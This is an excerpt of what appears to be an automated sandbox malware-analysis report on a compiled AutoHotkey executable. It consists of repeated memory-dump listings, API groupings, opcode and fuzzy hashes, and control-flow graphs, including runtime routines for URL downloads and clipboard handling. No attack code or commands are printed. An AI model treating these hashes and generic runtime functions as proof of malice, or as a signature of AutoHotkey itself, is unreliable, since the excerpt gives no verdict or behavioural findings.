                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: __doserrno_errno_invalid_parameter_noinfo
                            • String ID: U
                            • API String ID: 3902385426-4171548499
                            • Opcode ID: 06413b1bd371d3dbb85101d0a98e85e343a0fb7330b48fab9a6da1f1a1ebab97
                            • Instruction ID: 85f06c2c672a9a5319648f238344b69cc69f427f5d3ca7b7491bca8ea9af5a32
                            • Opcode Fuzzy Hash: 06413b1bd371d3dbb85101d0a98e85e343a0fb7330b48fab9a6da1f1a1ebab97
                            • Instruction Fuzzy Hash: 1712CF3221468586FB228F26E4443EEB7A1FB9DBD4F544116FB89476B4DB3DC446CB20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1235 14007e490-14007e4bf 1236 14007e4c0-14007e4c7 1235->1236 1237 14007e4cf-14007e4d3 1236->1237 1238 14007e4c9-14007e4cd 1236->1238 1237->1236 1238->1237 1239 14007e4d5-14007e4d9 1238->1239 1240 14007e550-14007e575 InternetOpenW 1239->1240 1241 14007e4db-14007e4ec call 1400148a0 1239->1241 1242 14007e577-14007e598 InternetOpenUrlW 1240->1242 1243 14007e5a3-14007e5ad call 14003f1a0 1240->1243 1251 14007e4fe-14007e503 call 1400cbb78 1241->1251 1252 14007e4ee-14007e4fc call 1400cc670 1241->1252 1246 14007e5ca-14007e5e7 call 1400ccdec 1242->1246 1247 14007e59a-14007e59d InternetCloseHandle 1242->1247 1254 14007e814-14007e82f 1243->1254 1259 14007e602-14007e642 1246->1259 1260 14007e5e9-14007e5fd InternetCloseHandle * 2 1246->1260 1247->1243 1261 14007e505-14007e50b 1251->1261 1252->1261 1263 14007e648-14007e64c 1259->1263 1264 14007e71e-14007e737 InternetReadFileExA 1259->1264 1262 14007e804-14007e80c call 14003f1a0 1260->1262 1261->1240 1265 14007e50d-14007e513 1261->1265 1262->1254 1263->1264 1269 14007e652-14007e670 InternetReadFile 1263->1269 1267 14007e7d8-14007e7ed InternetCloseHandle * 2 call 1400cd090 1264->1267 1268 14007e73d 1264->1268 1265->1240 1271 14007e515 1265->1271 1275 14007e7f2-14007e7f4 1267->1275 1273 14007e740-14007e745 1268->1273 1269->1267 1274 14007e676 1269->1274 1276 14007e520-14007e52c 1271->1276 1273->1267 1277 14007e74b-14007e764 GetTickCount 1273->1277 1278 14007e680-14007e687 1274->1278 1279 14007e7f6-14007e7ff DeleteFileW 1275->1279 1280 14007e801 1275->1280 1281 14007e530-14007e533 1276->1281 1282 14007e766-14007e780 PeekMessageW 1277->1282 1283 14007e79b-14007e7d2 call 1400ccf84 InternetReadFileExA 1277->1283 1278->1267 1284 14007e68d-14007e6a6 GetTickCount 1278->1284 1279->1280 1280->1262 1288 14007e535-14007e540 1281->1288 1289 14007e5b2 1281->1289 1290 14007e782-14007e78a call 140001a70 1282->1290 1291 14007e78f-14007e795 GetTickCount 1282->1291 1283->1267 1283->1273 1285 14007e6a8-14007e6c2 PeekMessageW 1284->1285 1286 14007e6dd-14007e713 call 1400ccf84 InternetReadFile 1284->1286 1292 14007e6c4-14007e6cc call 140001a70 1285->1292 1293 14007e6d1-14007e6d7 GetTickCount 1285->1293 1286->1278 1303 14007e719 1286->1303 1288->1281 1297 14007e542-14007e54e 1288->1297 1295 14007e5b5-14007e5bc 1289->1295 1290->1291 1291->1283 1292->1293 1293->1286 1300 14007e5c4-14007e5c8 1295->1300 1301 14007e5be-14007e5c2 1295->1301 1297->1240 1297->1276 1300->1295 1301->1240 1301->1300 1303->1267
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Internet$CloseFileHandle$CountReadTick$MessageOpenPeek$Delete_wcstoi64fclose
                            • String ID: *$8$AutoHotkey
                            • API String ID: 338787218-1845633735
                            • Opcode ID: c9981cc373f0a9db18ab43706371ba063c0c7d021de61666decf5073e7d38cad
                            • Instruction ID: a1e9b980196a4065178655460da392e8d6f71c9f89ba9e3ba34c40b1ba1ad674
                            • Opcode Fuzzy Hash: c9981cc373f0a9db18ab43706371ba063c0c7d021de61666decf5073e7d38cad
                            • Instruction Fuzzy Hash: 3FA1A332205B8186F7A69B66E8507E977A1FB8DBD8F440021FF4957AA4EF3CC985C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _errno$ErrorFileLast$CloseCreateHandle__doserrno_lseek_nolock$_invalid_parameter_noinfo$Type_get_daylight
                            • String ID:
                            • API String ID: 6860575-0
                            • Opcode ID: c8d7925bee072dc3ab2ae1d360aaa4655dc7e912142a973ee87aa6a5519d7f1a
                            • Instruction ID: 634804dc47e32bf0624d2e58f39f0c912200e57a40b8577b2fc4312e8326443e
                            • Opcode Fuzzy Hash: c8d7925bee072dc3ab2ae1d360aaa4655dc7e912142a973ee87aa6a5519d7f1a
                            • Instruction Fuzzy Hash: C332F33671065086FB678B7AD450BEC36A1AB4C7E8F144615FF1A47BF5EB38C8428721
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Windowwcsncpy$Message$ClassCurrentDialogDirectoryDragFinishForegroundNameProcessShowThread
                            • String ID: #32770
                            • API String ID: 1745663375-463685578
                            • Opcode ID: b98e8406d395b4fa1adf5c47473018667ed2c76ace2146061bc20ed7ced74d64
                            • Instruction ID: d01335d4f6662acdc231c1aad6069e277089882058ab4940c04144833fa784ea
                            • Opcode Fuzzy Hash: b98e8406d395b4fa1adf5c47473018667ed2c76ace2146061bc20ed7ced74d64
                            • Instruction Fuzzy Hash: AB2290B2605A908AFB67CF27A8547E937A4F78DBD8F144115EB8A17BB4DB34C881C710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlockfreemalloc
                            • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                            • API String ID: 720627891-457448710
                            • Opcode ID: f13765f806a90751c36c1ff3cef502a61cf87c10dc81b34f37026fb700e49095
                            • Instruction ID: 9fd40459b66eb6a889fc60882920b7c6ea233aa423442a16044e72b577a57c96
                            • Opcode Fuzzy Hash: f13765f806a90751c36c1ff3cef502a61cf87c10dc81b34f37026fb700e49095
                            • Instruction Fuzzy Hash: D2229B32204B408AFB679B27E4543EA67A2F74DBD4F544216EB5A47BF9DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$free$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64
                            • String ID: D
                            • API String ID: 2580995969-2746444292
                            • Opcode ID: 7e874d8fd1f0582d017fdbdbc363c6ec15b362b52b26484db3f67cc13263c7b0
                            • Instruction ID: d39ea2a658c4a7b38ae67528f92b5afed482653ad331f6357d27c8b36908dc66
                            • Opcode Fuzzy Hash: 7e874d8fd1f0582d017fdbdbc363c6ec15b362b52b26484db3f67cc13263c7b0
                            • Instruction Fuzzy Hash: B4226C32605B448AFB67CB67D8803EE67A1F78DBD4F540116EB8A57AB5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID: Parameter #2 invalid.$Parameter #3 invalid.$Read
                            • API String ID: 0-931347957
                            • Opcode ID: 79645b44cacc5452333a743317421d58383a3d6be94c6bca093b60535f45133a
                            • Instruction ID: 3285ffaee158f80f97cae7e5d10421a824c51a5b1f885021f6b4bbf5dd29bac8
                            • Opcode Fuzzy Hash: 79645b44cacc5452333a743317421d58383a3d6be94c6bca093b60535f45133a
                            • Instruction Fuzzy Hash: 6F224B36605B508AFB678B2BE8407EE27A1F74CBD4F554126EF4947AB8DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3931 1400b2650-1400b265c 3932 1400b265e-1400b2665 3931->3932 3933 1400b2666-1400b267c GetWindowThreadProcessId 3931->3933 3934 1400b267e-1400b2688 call 1400b4250 3933->3934 3935 1400b2697-1400b26b0 GetForegroundWindow IsIconic 3933->3935 3934->3935 3942 1400b268a-1400b2696 3934->3942 3937 1400b26c0-1400b26c3 3935->3937 3938 1400b26b2-1400b26ba ShowWindow 3935->3938 3940 1400b26d8-1400b26df 3937->3940 3941 1400b26c5-1400b26d7 3937->3941 3938->3937 3943 1400b26e1-1400b26e7 call 1400b25b0 3940->3943 3944 1400b26f5-1400b2717 3940->3944 3949 1400b26ec-1400b26ef 3943->3949 3946 1400b2719-1400b2729 GetWindowThreadProcessId 3944->3946 3947 1400b277e 3944->3947 3948 1400b2783 3946->3948 3950 1400b272b-1400b2731 3946->3950 3947->3948 3951 1400b2785-1400b278b call 1400b25b0 3948->3951 3949->3944 3952 1400b2840-1400b284f 3949->3952 3953 1400b275a-1400b275d 3950->3953 3954 1400b2733-1400b273d call 1400b4250 3950->3954 3960 1400b2790-1400b2796 3951->3960 3953->3948 3955 1400b275f-1400b2762 3953->3955 3954->3953 3961 1400b273f-1400b2756 AttachThreadInput 3954->3961 3955->3948 3959 1400b2764-1400b277c AttachThreadInput 3955->3959 3959->3948 3962 1400b2798-1400b279d 3960->3962 3963 1400b27e7-1400b27f4 3960->3963 3961->3953 3962->3951 3966 1400b279f-1400b27e4 call 1400172d0 * 2 call 1400b25b0 3962->3966 3964 1400b2808-1400b2810 3963->3964 3965 1400b27f6-1400b2802 AttachThreadInput 3963->3965 3967 1400b2812-1400b281b AttachThreadInput 3964->3967 3968 1400b2821-1400b2829 3964->3968 3965->3964 3966->3963 3967->3968 3970 1400b282b-1400b2837 BringWindowToTop 3968->3970 3971 1400b2839 3968->3971 3973 1400b283b 3970->3973 3971->3973 3973->3952
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ProcessThreadWindow
                            • String ID:
                            • API String ID: 1653199695-0
                            • Opcode ID: 258fbb36bc0d8241f5f30e30395a32fa73bc28745546f37e110b1db5dd89fe0e
                            • Instruction ID: e443d94edaeacfae671461fea15a2ec7f5c32c0642453533ab5af42f8fd6eb74
                            • Opcode Fuzzy Hash: 258fbb36bc0d8241f5f30e30395a32fa73bc28745546f37e110b1db5dd89fe0e
                            • Instruction Fuzzy Hash: F2518C31704A4186FA669F67B8107AB67B1BB8DBD4F581024BF4A5BBB5DE3DC881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Resource$FindInfoLoadLockSizeofmalloc
                            • String ID: >AUTOHOTKEY SCRIPT<$Could not extract script from EXE.
                            • API String ID: 3366556718-1775548002
                            • Opcode ID: 840d3e8bd2a95796dacf3a100e672b9923200d7120eda528d17b46d9d9697ea1
                            • Instruction ID: cab6452ae4ea39bf66a56cbe86202ff63733d7b139b4f8c1968d271111c70a4e
                            • Opcode Fuzzy Hash: 840d3e8bd2a95796dacf3a100e672b9923200d7120eda528d17b46d9d9697ea1
                            • Instruction Fuzzy Hash: 1C312A31605B4181EF568B56E45439AA7A0F74CBD4F488129EF8D0BBAADF7CC544CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: 4056a64f022cceb0b9e7b8a2bf314aeb2360360c8667111d46ef66bb8d791686
                            • Instruction ID: 94cdea3f9907efedc516e2110913d4c69deef7d2003eb3cdd69ab6ac2ddfa90e
                            • Opcode Fuzzy Hash: 4056a64f022cceb0b9e7b8a2bf314aeb2360360c8667111d46ef66bb8d791686
                            • Instruction Fuzzy Hash: 5951CE32304B8491EE168B16D5483EEB3A9FB58BE4F558716EB69077E4DF38C54AC700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Heap$CreateInformationVersion
                            • String ID:
                            • API String ID: 3563531100-0
                            • Opcode ID: 867d4f5f3279397e4bbd960a59fafff3a38206645af244dc8cfd15551f6c3b06
                            • Instruction ID: 63c02c62673443b255dc33ca7baa30011fb977f08ed244e21473c830617398ca
                            • Opcode Fuzzy Hash: 867d4f5f3279397e4bbd960a59fafff3a38206645af244dc8cfd15551f6c3b06
                            • Instruction Fuzzy Hash: 85E0927462174082FB8A5B53F845BE92261F78C780F805414FB4A03B74DF3CC4958700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7ff647453dfc0595fa38c5452dfa41f10c5cee97e853db53694640067afaa161
                            • Instruction ID: 352ee66d33409a8207d53355359db1d6f0d7ce4a317c326a2f5a1df4ccb30269
                            • Opcode Fuzzy Hash: 7ff647453dfc0595fa38c5452dfa41f10c5cee97e853db53694640067afaa161
                            • Instruction Fuzzy Hash: 3D91B47321869481FB6A8F1794403F922A1FF4EBE4F554116EB9A47EE4DE3CDA82D340
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1831 140005690-1400056b2 1832 1400056f3-1400056f6 1831->1832 1833 1400056b4-1400056be 1831->1833 1834 140005771-140005778 1832->1834 1835 1400056f8-1400056ff 1832->1835 1836 1400056e7-1400056f1 1833->1836 1837 1400056c0-1400056c6 1833->1837 1839 14000577e-140005798 FindWindowW 1834->1839 1840 14000581c 1834->1840 1838 140005701-140005708 1835->1838 1835->1839 1836->1835 1837->1836 1841 1400056c8-1400056cf 1837->1841 1838->1840 1844 14000570e-140005728 FindWindowW 1838->1844 1839->1840 1842 14000579e 1839->1842 1845 140005821-140005835 1840->1845 1841->1836 1843 1400056d1-1400056d8 1841->1843 1846 1400057a3-1400057ce PostMessageW Sleep IsWindow 1842->1846 1843->1836 1847 1400056da-1400056e1 1843->1847 1844->1834 1848 14000572a-140005733 1844->1848 1849 140005811-140005816 Sleep 1846->1849 1850 1400057d0-1400057d3 1846->1850 1847->1834 1847->1836 1851 140005735-14000573a 1848->1851 1852 14000573f-140005742 1848->1852 1849->1840 1853 1400057d5-1400057f3 call 1400b3ef0 1850->1853 1854 1400057f7-14000580f Sleep IsWindow 1850->1854 1851->1845 1855 140005744-140005768 call 1400b3ef0 1852->1855 1856 14000576a-14000576f 1852->1856 1861 1400057f5 1853->1861 1862 140005836-140005838 1853->1862 1854->1849 1854->1850 1855->1851 1855->1856 1856->1846 1861->1854 1862->1845
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Window$Sleep$Find$MessagePost
                            • String ID: An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta$AutoHotkey$Could not close the previous instance of this script. Keep waiting?$d
                            • API String ID: 1104075879-823662016
                            • Opcode ID: 534af8cbe4c465dde1be47f0b0cc61f8d6374477e8bbc3458ef2448a851e8a90
                            • Instruction ID: e2dd331400aee73dd6788f8c969a16774231fd3242114c7c800b54ab95a38d39
                            • Opcode Fuzzy Hash: 534af8cbe4c465dde1be47f0b0cc61f8d6374477e8bbc3458ef2448a851e8a90
                            • Instruction Fuzzy Hash: F641A1B0608A8482FB67DB27F8443EA23A0F74EBD5F544112FB4957AB0DB39C982D741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
